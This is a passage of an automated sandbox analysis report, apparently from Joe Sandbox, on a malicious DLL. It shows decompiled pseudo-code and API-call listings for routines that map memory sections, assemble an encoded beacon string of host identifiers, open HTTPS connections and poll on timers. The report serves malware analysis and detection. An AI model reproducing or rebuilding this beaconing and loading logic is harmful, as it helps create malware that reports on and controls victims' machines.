                                							} else {
                                								_t50 = _t61;
                                								if(_t61 != 0) {
                                									goto L6;
                                								}
                                							}
                                							L23:
                                							_v12 = _v12 + 0x14;
                                							_t46 =  *((intOrPtr*)(_v12 + 0xc));
                                							if(_t46 != 0) {
                                								continue;
                                							} else {
                                							}
                                							L26:
                                							goto L27;
                                						}
                                						_t60 = _t59 + 0x964da13a;
                                						__eflags = _t60;
                                						_v20 = _t60;
                                						goto L26;
                                					}
                                				}
                                				L27:
                                				return _v20;
                                			}

                                0x10001753
                                0x1000175c
                                0x10001761
                                0x10001767
                                0x10001770
                                0x10001776
                                0x10001778
                                0x1000177b
                                0x10001780
                                0x10001787
                                0x10001787
                                0x1000178b
                                0x10001791
                                0x10001796
                                0x00000000
                                0x00000000
                                0x1000179c
                                0x100017a6
                                0x100017a8
                                0x100017ab
                                0x100017ae
                                0x100017b2
                                0x100017ba
                                0x100017bc
                                0x100017bf
                                0x10001827
                                0x10001827
                                0x1000182b
                                0x00000000
                                0x00000000
                                0x100017c4
                                0x100017ca
                                0x100017cc
                                0x100017df
                                0x100017e2
                                0x100017e2
                                0x100017e2
                                0x100017e6
                                0x100017ce
                                0x100017ce
                                0x100017d6
                                0x100017d8
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x100017d8
                                0x100017c6
                                0x100017c6
                                0x100017da
                                0x100017da
                                0x100017da
                                0x100017e9
                                0x100017ec
                                0x100017ee
                                0x100017f5
                                0x100017f0
                                0x100017f0
                                0x100017f0
                                0x100017fd
                                0x10001803
                                0x10001805
                                0x10001835
                                0x10001807
                                0x10001807
                                0x1000180a
                                0x1000180c
                                0x10001814
                                0x10001814
                                0x10001819
                                0x1000181b
                                0x10001822
                                0x10001824
                                0x10001824
                                0x10001824
                                0x00000000
                                0x10001824
                                0x00000000
                                0x10001805
                                0x100017b4
                                0x100017b4
                                0x100017b8
                                0x00000000
                                0x00000000
                                0x100017b8
                                0x10001838
                                0x10001838
                                0x1000183f
                                0x10001844
                                0x00000000
                                0x00000000
                                0x1000184a
                                0x10001855
                                0x00000000
                                0x10001855
                                0x1000184c
                                0x1000184c
                                0x10001852
                                0x00000000
                                0x10001852
                                0x10001780
                                0x10001856
                                0x1000185b

                                APIs
                                • LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 1000178B
                                • GetProcAddress.KERNEL32(?,00000000), ref: 100017FD
                                Memory Dump Source
                                • Source File: 00000000.00000002.797650137.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.797669903.0000000010005000.00000040.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID:
                                • API String ID: 2574300362-0
                                • Opcode ID: 70ecc16c6501927fe6db6f758ebb3a938f0ac427aab5bfe6df336eca88a01f20
                                • Instruction ID: 50a551485af94626e36314b7bf6b70129b1ae1d3f994bda35dae46301a5f1ec2
                                • Opcode Fuzzy Hash: 70ecc16c6501927fe6db6f758ebb3a938f0ac427aab5bfe6df336eca88a01f20
                                • Instruction Fuzzy Hash: 28315E75A0520ADFEB54CF59C890AEEB7F9FF04390B21816DD905E7248EB70DA41CB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 68%
                                			E1000129A(void** __esi, PVOID* _a4) {
                                				long _v8;
                                				void* _v12;
                                				void* _v16;
                                				long _t13;
                                
                                				_v16 = 0;
                                				asm("stosd");
                                				_v8 = 0;
                                				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                                				if(_t13 < 0) {
                                					_push(_t13);
                                					return __esi[6]();
                                				}
                                				return 0;
                                			}

                                0x100012ac
                                0x100012b2
                                0x100012c0
                                0x100012c7
                                0x100012cc
                                0x100012d2
                                0x00000000
                                0x100012d3
                                0x00000000

                                APIs
                                • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,1000120F,00000002,00000000,?,?,00000000,?,?,1000120F,00000002), ref: 100012C7
                                Memory Dump Source
                                • Source File: 00000000.00000002.797650137.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.797669903.0000000010005000.00000040.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: SectionView
                                • String ID:
                                • API String ID: 1323581903-0
                                • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                • Instruction ID: 1bbf4d541b5034d903cd5fef98454c375a8041f9e67df69a1e1feed1aad9265f
                                • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                • Instruction Fuzzy Hash: D1F01CB690020CFFEB119FA5DC85C9FBBBDEB44294B104939B552E1094D6309E189A60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 66%
                                			E00D49BF1(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a16, void* _a24, intOrPtr _a32) {
                                				intOrPtr _v0;
                                				intOrPtr _v4;
                                				intOrPtr _v16;
                                				intOrPtr _v24;
                                				intOrPtr _v28;
                                				void* _v44;
                                				intOrPtr _v52;
                                				void* __edi;
                                				long _t25;
                                				intOrPtr _t26;
                                				intOrPtr _t27;
                                				intOrPtr _t28;
                                				intOrPtr _t29;
                                				intOrPtr _t30;
                                				void* _t33;
                                				intOrPtr _t34;
                                				int _t37;
                                				void* _t38;
                                				void* _t39;
                                				intOrPtr _t42;
                                				intOrPtr _t43;
                                				intOrPtr _t50;
                                				intOrPtr _t54;
                                				intOrPtr* _t56;
                                				intOrPtr _t62;
                                				intOrPtr _t68;
                                				intOrPtr _t71;
                                				intOrPtr _t74;
                                				int _t77;
                                				intOrPtr _t78;
                                				int _t81;
                                				intOrPtr _t83;
                                				int _t86;
                                				intOrPtr* _t89;
                                				intOrPtr* _t90;
                                				void* _t91;
                                				void* _t95;
                                				void* _t96;
                                				void* _t97;
                                				intOrPtr _t98;
                                				void* _t100;
                                				int _t101;
                                				void* _t102;
                                				void* _t103;
                                				void* _t105;
                                				void* _t106;
                                				void* _t108;
                                
                                				_t95 = __edx;
                                				_t91 = __ecx;
                                				_t25 = __eax;
                                				_t105 = _a16;
                                				_v4 = 8;
                                				if(__eax == 0) {
                                					_t25 = GetTickCount();
                                				}
                                				_t26 =  *0xd4d018; // 0xefcf766a
                                				asm("bswap eax");
                                				_t27 =  *0xd4d014; // 0x3a87c8cd
                                				asm("bswap eax");
                                				_t28 =  *0xd4d010; // 0xd8d2f808
                                				asm("bswap eax");
                                				_t29 = E00D4D00C; // 0xeec43f25
                                				asm("bswap eax");
                                				_t30 =  *0xd4d2a8; // 0x253a5a8
                                				_t3 = _t30 + 0xd4e633; // 0x74666f73
                                				_t101 = wsprintfA(_t105, _t3, 2, 0x3d163, _t29, _t28, _t27, _t26,  *0xd4d02c,  *0xd4d004, _t25);
                                				_t33 = E00D43288();
                                				_t34 =  *0xd4d2a8; // 0x253a5a8
                                				_t4 = _t34 + 0xd4e673; // 0x74707526
                                				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
                                				_t108 = _t106 + 0x38;
                                				_t102 = _t101 + _t37; // executed
                                				_t38 = E00D4831C(_t91); // executed
                                				_t96 = _t38;
                                				if(_t96 != 0) {
                                					_t83 =  *0xd4d2a8; // 0x253a5a8
                                					_t6 = _t83 + 0xd4e8d4; // 0x736e6426
                                					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
                                					_t108 = _t108 + 0xc;
                                					_t102 = _t102 + _t86;
                                					HeapFree( *0xd4d238, 0, _t96); // executed
                                				}
                                				_t39 = E00D49267(); // executed
                                				_t97 = _t39;
                                				if(_t97 != 0) {
                                					_t78 =  *0xd4d2a8; // 0x253a5a8
                                					_t8 = _t78 + 0xd4e8dc; // 0x6f687726
                                					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
                                					_t108 = _t108 + 0xc;
                                					_t102 = _t102 + _t81;
                                					HeapFree( *0xd4d238, 0, _t97);
                                				}
                                				_t98 =  *0xd4d32c; // 0x32895b0
                                				_a32 = E00D4284E(0xd4d00a, _t98 + 4);
                                				_t42 =  *0xd4d2d0; // 0x0
                                				if(_t42 != 0) {
                                					_t74 =  *0xd4d2a8; // 0x253a5a8
                                					_t11 = _t74 + 0xd4e8b6; // 0x3d736f26
                                					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
                                					_t108 = _t108 + 0xc;
                                					_t102 = _t102 + _t77;
                                				}
                                				_t43 =  *0xd4d2cc; // 0x0
                                				if(_t43 != 0) {
                                					_t71 =  *0xd4d2a8; // 0x253a5a8
                                					_t13 = _t71 + 0xd4e88d; // 0x3d706926
                                					wsprintfA(_t102 + _t105, _t13, _t43);
                                				}
                                				if(_a32 != 0) {
                                					_t100 = RtlAllocateHeap( *0xd4d238, 0, 0x800);
                                					if(_t100 != 0) {
                                						E00D43239(GetTickCount());
                                						_t50 =  *0xd4d32c; // 0x32895b0
                                						__imp__(_t50 + 0x40);
                                						asm("lock xadd [eax], ecx");
                                						_t54 =  *0xd4d32c; // 0x32895b0
                                						__imp__(_t54 + 0x40);
                                						_t56 =  *0xd4d32c; // 0x32895b0
                                						_t103 = E00D47B8D(1, _t95, _t105,  *_t56);
                                						asm("lock xadd [eax], ecx");
                                						if(_t103 != 0) {
                                							StrTrimA(_t103, 0xd4c28c);
                                							_push(_t103);
                                							_t62 = E00D4A677();
                                							_v16 = _t62;
                                							if(_t62 != 0) {
                                								_t89 = __imp__;
                                								 *_t89(_t103, _v0);
                                								 *_t89(_t100, _a4);
                                								_t90 = __imp__;
                                								 *_t90(_t100, _v28);
                                								 *_t90(_t100, _t103);
                                								_t68 = E00D4933A(0xffffffffffffffff, _t100, _v28, _v24); // executed
                                								_v52 = _t68;
                                								if(_t68 != 0 && _t68 != 0x10d2) {
                                									E00D45433();
                                								}
                                								HeapFree( *0xd4d238, 0, _v44);
                                							}
                                							RtlFreeHeap( *0xd4d238, 0, _t103); // executed
                                						}
                                						RtlFreeHeap( *0xd4d238, 0, _t100); // executed
                                					}
                                					HeapFree( *0xd4d238, 0, _a24);
                                				}
                                				RtlFreeHeap( *0xd4d238, 0, _t105); // executed
                                				return _a4;
                                			}

                                0x00d49bf1
                                0x00d49bf1

                                APIs
                                • GetTickCount.KERNEL32 ref: 00D49C08
                                • wsprintfA.USER32 ref: 00D49C55
                                • wsprintfA.USER32 ref: 00D49C72
                                • wsprintfA.USER32 ref: 00D49C95
                                • HeapFree.KERNEL32(00000000,00000000), ref: 00D49CA5
                                • wsprintfA.USER32 ref: 00D49CC7
                                • HeapFree.KERNEL32(00000000,00000000), ref: 00D49CD7
                                • wsprintfA.USER32 ref: 00D49D0E
                                • wsprintfA.USER32 ref: 00D49D2E
                                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00D49D4B
                                • GetTickCount.KERNEL32 ref: 00D49D5B
                                • RtlEnterCriticalSection.NTDLL(03289570), ref: 00D49D6F
                                • RtlLeaveCriticalSection.NTDLL(03289570), ref: 00D49D8D
                                  • Part of subcall function 00D47B8D: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7691C740,?,?,00D49DA0,?,032895B0), ref: 00D47BB8
                                  • Part of subcall function 00D47B8D: lstrlen.KERNEL32(?,?,?,00D49DA0,?,032895B0), ref: 00D47BC0
                                  • Part of subcall function 00D47B8D: strcpy.NTDLL ref: 00D47BD7
                                  • Part of subcall function 00D47B8D: lstrcat.KERNEL32(00000000,?), ref: 00D47BE2
                                  • Part of subcall function 00D47B8D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00D49DA0,?,032895B0), ref: 00D47BFF
                                • StrTrimA.SHLWAPI(00000000,00D4C28C,?,032895B0), ref: 00D49DBF
                                  • Part of subcall function 00D4A677: lstrlen.KERNEL32(03289B08,00000000,00000000,7691C740,00D49DCB,00000000), ref: 00D4A687
                                  • Part of subcall function 00D4A677: lstrlen.KERNEL32(?), ref: 00D4A68F
                                  • Part of subcall function 00D4A677: lstrcpy.KERNEL32(00000000,03289B08), ref: 00D4A6A3
                                  • Part of subcall function 00D4A677: lstrcat.KERNEL32(00000000,?), ref: 00D4A6AE
                                • lstrcpy.KERNEL32(00000000,?), ref: 00D49DDE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00D49DE5
                                • lstrcat.KERNEL32(00000000,?), ref: 00D49DF2
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00D49DF6
                                  • Part of subcall function 00D4933A: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,74E481D0), ref: 00D493EC
                                • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 00D49E26
                                • RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 00D49E35
                                • RtlFreeHeap.NTDLL(00000000,00000000,?,032895B0), ref: 00D49E44
                                • HeapFree.KERNEL32(00000000,00000000), ref: 00D49E56
                                • RtlFreeHeap.NTDLL(00000000,?), ref: 00D49E65
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                • String ID: Ut
                                • API String ID: 3080378247-8415677
                                • Opcode ID: 18000200cd5040f64bfe13544e84bb4200c1939b7fb68e2d85c00000c7e722d4
                                • Instruction ID: ca4e2b50e79f1b23f909ee282ab055097e01e64bd3ded3d52a260850a04fb667
                                • Opcode Fuzzy Hash: 18000200cd5040f64bfe13544e84bb4200c1939b7fb68e2d85c00000c7e722d4
                                • Instruction Fuzzy Hash: 6E619D39501300AFC7219F69EC89E6BBBEAEB4A750F040524F904D7371DB75E8059B79
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 83%
                                			E00D47C3D(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                				struct %anon52 _v8;
                                				long _v12;
                                				char _v16;
                                				char _v20;
                                				signed int _v24;
                                				intOrPtr _v32;
                                				union _LARGE_INTEGER _v36;
                                				intOrPtr _v40;
                                				void* _v44;
                                				void _v88;
                                				char _v92;
                                				struct %anon52 _t46;
                                				intOrPtr _t51;
                                				long _t53;
                                				void* _t54;
                                				struct %anon52 _t60;
                                				long _t64;
                                				signed int _t65;
                                				void* _t68;
                                				void* _t70;
                                				signed int _t71;
                                				intOrPtr _t73;
                                				intOrPtr _t76;
                                				void** _t78;
                                				void* _t80;
                                
                                				_t73 = __edx;
                                				_v92 = 0;
                                				memset( &_v88, 0, 0x2c);
                                				_t46 = CreateWaitableTimerA(0, 1, 0);
                                				_v44 = _t46;
                                				if(_t46 == 0) {
                                					_v8.LowPart = GetLastError();
                                				} else {
                                					_push(0xffffffff);
                                					_push(0xff676980);
                                					_push(0);
                                					_push( *0xd4d240);
                                					_v20 = 0;
                                					_v16 = 0;
                                					L00D4AF6E();
                                					_v36.LowPart = _t46;
                                					_v32 = _t73;
                                					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                                					_t51 =  *0xd4d26c; // 0x208
                                					_v40 = _t51;
                                					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                					_v8.LowPart = _t53;
                                					if(_t53 == 0) {
                                						if(_a8 != 0) {
                                							L4:
                                							 *0xd4d24c = 5;
                                						} else {
                                							_t68 = E00D45319(_t73); // executed
                                							if(_t68 != 0) {
                                								goto L4;
                                							}
                                						}
                                						_v12 = 0;
                                						L6:
                                						L6:
                                						if(_v12 == 1 && ( *0xd4d260 & 0x00000001) == 0) {
                                							_v12 = 2;
                                						}
                                						_t71 = _v12;
                                						_t58 = _t71 << 4;
                                						_t76 = _t80 + (_t71 << 4) - 0x54;
                                						_t72 = _t71 + 1;
                                						_v24 = _t71 + 1;
                                						_t60 = E00D42C58(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16); // executed
                                						_v8.LowPart = _t60;
                                						if(_t60 != 0) {
                                							goto L17;
                                						}
                                						_t65 = _v24;
                                						_v12 = _t65;
                                						_t90 = _t65 - 3;
                                						if(_t65 != 3) {
                                							goto L6;
                                						} else {
                                							_v8.LowPart = E00D49870(_t72, _t90,  &_v92, _a4, _a8);
                                						}
                                						goto L12;
                                						L17:
                                						__eflags = _t60 - 0x10d2;
                                						if(_t60 != 0x10d2) {
                                							_push(0xffffffff);
                                							_push(0xff676980);
                                							_push(0);
                                							_push( *0xd4d244);
                                							goto L21;
                                						} else {
                                							__eflags =  *0xd4d248; // 0x0
                                							if(__eflags == 0) {
                                								goto L12;
                                							} else {
                                								_t60 = E00D45433();
                                								_push(0xffffffff);
                                								_push(0xdc3cba00);
                                								_push(0);
                                								_push( *0xd4d248);
                                								L21:
                                								L00D4AF6E();
                                								_v36.LowPart = _t60;
                                								_v32 = _t76;
                                								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
                                								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                								_v8.LowPart = _t64;
                                								__eflags = _t64;
                                								if(_t64 == 0) {
                                									goto L6;
                                								} else {
                                									goto L12;
                                								}
                                							}
                                						}
                                						L25:
                                					}
                                					L12:
                                					_t78 =  &_v92;
                                					_t70 = 3;
                                					do {
                                						_t54 =  *_t78;
                                						if(_t54 != 0) {
                                							HeapFree( *0xd4d238, 0, _t54);
                                						}
                                						_t78 =  &(_t78[4]);
                                						_t70 = _t70 - 1;
                                					} while (_t70 != 0);
                                					CloseHandle(_v44);
                                				}
                                				return _v8;
                                				goto L25;
                                			}


                                APIs
                                • memset.NTDLL ref: 00D47C52
                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 00D47C5E
                                • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 00D47C83
                                • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 00D47C9F
                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00D47CB8
                                • HeapFree.KERNEL32(00000000,00000000), ref: 00D47D4E
                                • CloseHandle.KERNEL32(?), ref: 00D47D5D
                                • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 00D47D97
                                • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,00D4312C,?), ref: 00D47DAD
                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00D47DB8
                                  • Part of subcall function 00D45319: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,03289368,00000000,?,74E5F710,00000000,74E5F730), ref: 00D45368
                                  • Part of subcall function 00D45319: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,032893A0,?,00000000,30314549,00000014,004F0053,0328935C), ref: 00D45405
                                  • Part of subcall function 00D45319: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00D47CCB), ref: 00D45417
                                • GetLastError.KERNEL32 ref: 00D47DCA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                • String ID: Ut
                                • API String ID: 3521023985-8415677
                                • Opcode ID: 4abe1ce5fdf8682e596fe9dde6b9117bfe21012d8619466eeab4f01a9500ece0
                                • Instruction ID: 193f1a9a75e1284c8270a510fa0b229c8d438762af25066c3dad45bc55eaa55b
                                • Opcode Fuzzy Hash: 4abe1ce5fdf8682e596fe9dde6b9117bfe21012d8619466eeab4f01a9500ece0
                                • Instruction Fuzzy Hash: 4D514AB5905228EFCB20DF95DC849EEBFB9EF4A720F244615F815E6294D7708A44CBB0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 92%
                                			E00D4A85C(void* __eax, void* __ecx, long __esi, char* _a4) {
                                				void _v8;
                                				long _v12;
                                				void _v16;
                                				void* _t34;
                                				void* _t38;
                                				void* _t40;
                                				char* _t56;
                                				long _t57;
                                				void* _t58;
                                				intOrPtr _t59;
                                				long _t65;
                                
                                				_t65 = __esi;
                                				_t58 = __ecx;
                                				_v16 = 0xea60;
                                				__imp__( *(__esi + 4));
                                				_v12 = __eax + __eax;
                                				_t56 = E00D41525(__eax + __eax + 1);
                                				if(_t56 != 0) {
                                					if(InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0) == 0) {
                                						E00D48B22(_t56);
                                					} else {
                                						E00D48B22( *(__esi + 4));
                                						 *(__esi + 4) = _t56;
                                					}
                                				}
                                				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
                                				 *(_t65 + 0x10) = _t34;
                                				if(_t34 == 0 || InternetSetStatusCallback(_t34, E00D4A7F1) == 0xffffffff) {
                                					L15:
                                					return GetLastError();
                                				} else {
                                					ResetEvent( *(_t65 + 0x1c));
                                					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x1bb, 0, 0, 3, 0, _t65); // executed
                                					 *(_t65 + 0x14) = _t38;
                                					if(_t38 != 0 || GetLastError() == 0x3e5 && E00D429C0( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
                                						_t59 =  *0xd4d2a8; // 0x253a5a8
                                						_t15 = _t59 + 0xd4e743; // 0x544547
                                						_v8 = 0x84c03180;
                                						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84c03180, _t65); // executed
                                						 *(_t65 + 0x18) = _t40;
                                						if(_t40 == 0) {
                                							goto L15;
                                						}
                                						_t57 = 4;
                                						_v12 = _t57;
                                						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) {
                                							_v8 = _v8 | 0x00000100;
                                							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
                                						}
                                						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
                                							goto L15;
                                						} else {
                                							return 0;
                                						}
                                					} else {
                                						goto L15;
                                					}
                                				}
                                			}


                                APIs
                                • lstrlen.KERNEL32(?,00000008,74E04D40), ref: 00D4A86E
                                  • Part of subcall function 00D41525: RtlAllocateHeap.NTDLL(00000000,00000000,00D41278), ref: 00D41531
                                • InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 00D4A891
                                • InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 00D4A8B9
                                • InternetSetStatusCallback.WININET(00000000,00D4A7F1), ref: 00D4A8D0
                                • ResetEvent.KERNEL32(?), ref: 00D4A8E2
                                • InternetConnectA.WININET(?,?,000001BB,00000000,00000000,00000003,00000000,?), ref: 00D4A8F8
                                • GetLastError.KERNEL32 ref: 00D4A905
                                • HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84C03180,?), ref: 00D4A94B
                                • InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 00D4A969
                                • InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 00D4A98A
                                • InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 00D4A996
                                • InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 00D4A9A6
                                • GetLastError.KERNEL32 ref: 00D4A9B0
                                  • Part of subcall function 00D48B22: RtlFreeHeap.NTDLL(00000000,00000000,00D4131A,00000000,?,?,00000000), ref: 00D48B2E
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
                                • String ID:
                                • API String ID: 2290446683-0
                                • Opcode ID: 69c70e45fbdef4149f178bedd36c3a8d1dafc0cfcba9d0c51befd6d826a44014
                                • Instruction ID: d34fd669e0c0ef9015e014f3a0cc0138695dead2347510ce42d45a826e6880e2
                                • Opcode Fuzzy Hash: 69c70e45fbdef4149f178bedd36c3a8d1dafc0cfcba9d0c51befd6d826a44014
                                • Instruction Fuzzy Hash: 0F417E75540304BFDB319FA5DC88EABBBBDEB89700B144929F542E11A0D731A944CF31
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 51%
                                			E00D4AC95(long _a4, long _a8) {
                                				signed int _v8;
                                				intOrPtr _v16;
                                				LONG* _v28;
                                				long _v40;
                                				long _v44;
                                				long _v48;
                                				CHAR* _v52;
                                				long _v56;
                                				CHAR* _v60;
                                				long _v64;
                                				signed int* _v68;
                                				char _v72;
                                				signed int _t76;
                                				signed int _t80;
                                				signed int _t81;
                                				intOrPtr* _t82;
                                				intOrPtr* _t83;
                                				intOrPtr* _t85;
                                				intOrPtr* _t90;
                                				intOrPtr* _t95;
                                				intOrPtr* _t98;
                                				struct HINSTANCE__* _t99;
                                				void* _t102;
                                				intOrPtr* _t104;
                                				void* _t115;
                                				long _t116;
                                				void _t125;
                                				void* _t131;
                                				signed short _t133;
                                				struct HINSTANCE__* _t138;
                                				signed int* _t139;
                                
                                				_t139 = _a4;
                                				_v28 = _t139[2] + 0xd40000;
                                				_t115 = _t139[3] + 0xd40000;
                                				_t131 = _t139[4] + 0xd40000;
                                				_v8 = _t139[7];
                                				_v60 = _t139[1] + 0xd40000;
                                				_v16 = _t139[5] + 0xd40000;
                                				_v64 = _a8;
                                				_v72 = 0x24;
                                				_v68 = _t139;
                                				_v56 = 0;
                                				asm("stosd");
                                				_v48 = 0;
                                				_v44 = 0;
                                				_v40 = 0;
                                				if(( *_t139 & 0x00000001) == 0) {
                                					_a8 =  &_v72;
                                					RaiseException(0xc06d0057, 0, 1,  &_a8);
                                					return 0;
                                				}
                                				_t138 =  *_v28;
                                				_t76 = _a8 - _t115 >> 2 << 2;
                                				_t133 =  *(_t131 + _t76);
                                				_a4 = _t76;
                                				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
                                				_v56 = _t80;
                                				_t81 = _t133 + 0xd40002;
                                				if(_t80 == 0) {
                                					_t81 = _t133 & 0x0000ffff;
                                				}
                                				_v52 = _t81;
                                				_t82 =  *0xd4d1a0; // 0x0
                                				_t116 = 0;
                                				if(_t82 == 0) {
                                					L6:
                                					if(_t138 != 0) {
                                						L18:
                                						_t83 =  *0xd4d1a0; // 0x0
                                						_v48 = _t138;
                                						if(_t83 != 0) {
                                							_t116 =  *_t83(2,  &_v72);
                                						}
                                						if(_t116 != 0) {
                                							L32:
                                							 *_a8 = _t116;
                                							L33:
                                							_t85 =  *0xd4d1a0; // 0x0
                                							if(_t85 != 0) {
                                								_v40 = _v40 & 0x00000000;
                                								_v48 = _t138;
                                								_v44 = _t116;
                                								 *_t85(5,  &_v72);
                                							}
                                							return _t116;
                                						} else {
                                							if(_t139[5] == _t116 || _t139[7] == _t116) {
                                								L27:
                                								_t116 = GetProcAddress(_t138, _v52);
                                								if(_t116 == 0) {
                                									_v40 = GetLastError();
                                									_t90 =  *0xd4d19c; // 0x0
                                									if(_t90 != 0) {
                                										_t116 =  *_t90(4,  &_v72);
                                									}
                                									if(_t116 == 0) {
                                										_a4 =  &_v72;
                                										RaiseException(0xc06d007f, _t116, 1,  &_a4);
                                										_t116 = _v44;
                                									}
                                								}
                                								goto L32;
                                							} else {
                                								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
                                								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
                                									_t116 =  *(_a4 + _v16);
                                									if(_t116 != 0) {
                                										goto L32;
                                									}
                                								}
                                								goto L27;
                                							}
                                						}
                                					}
                                					_t98 =  *0xd4d1a0; // 0x0
                                					if(_t98 == 0) {
                                						L9:
                                						_t99 = LoadLibraryA(_v60); // executed
                                						_t138 = _t99;
                                						if(_t138 != 0) {
